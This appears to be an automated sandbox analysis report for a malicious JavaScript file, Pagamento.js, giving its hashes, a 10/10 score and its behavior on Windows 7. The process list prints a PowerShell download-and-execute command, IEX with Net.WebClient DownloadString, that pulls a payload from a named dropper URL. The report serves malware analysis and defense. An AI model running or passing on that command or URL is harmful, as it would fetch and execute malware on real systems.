Analysis
-
max time kernel
31s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
29-05-2023 23:15
Static task
static1
Behavioral task
behavioral1
Sample
Pagamento.js
Resource
win7-20230220-en
windows7-x64
5 signatures
150 seconds
General
-
Target
Pagamento.js
-
Size
169KB
-
MD5
c0871f07733a3727e82c64aacda9a85b
-
SHA1
bf364b5b56ee65351a0bc5bca249ddeed5705e76
-
SHA256
3eafb742af9d3a8bbbe4bd90b19d175ea4b698505cc5623594d0f13ba883692e
-
SHA512
56f29de9c7b558ad3e24ee52378ce297bccfcc95bdeb74f3ec463493fe25dd2f869f1d74ede8238fe82b9bb11b9f088d47dea1df53f2a0a1b3a7a6c0ad29217e
-
SSDEEP
3072:zbT1AJM/EaZ8ok36/EI4+ZQSU2bokXPXliq3kJIAsKLfbT1AJM/EaZ8ok36/EI4c:zbZ0M/EaZ8ok36RftbokX0bZ0M/EaZ8M
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://propagandaetrafego.com/b.jpg
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 4 1284 powershell.exe 5 1284 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1284 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1284 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
wscript.exedescription pid process target process PID 1128 wrote to memory of 1284 1128 wscript.exe powershell.exe PID 1128 wrote to memory of 1284 1128 wscript.exe powershell.exe PID 1128 wrote to memory of 1284 1128 wscript.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\Pagamento.js1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" IEX (New-Object Net.WebClient).DownloadString.Invoke('https://propagandaetrafego.com/b.jpg')2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1284-58-0x000000001B210000-0x000000001B4F2000-memory.dmpFilesize
2.9MB
-
memory/1284-60-0x00000000024B0000-0x0000000002530000-memory.dmpFilesize
512KB
-
memory/1284-61-0x00000000024B0000-0x0000000002530000-memory.dmpFilesize
512KB
-
memory/1284-59-0x0000000002320000-0x0000000002328000-memory.dmpFilesize
32KB
-
memory/1284-62-0x00000000024B0000-0x0000000002530000-memory.dmpFilesize
512KB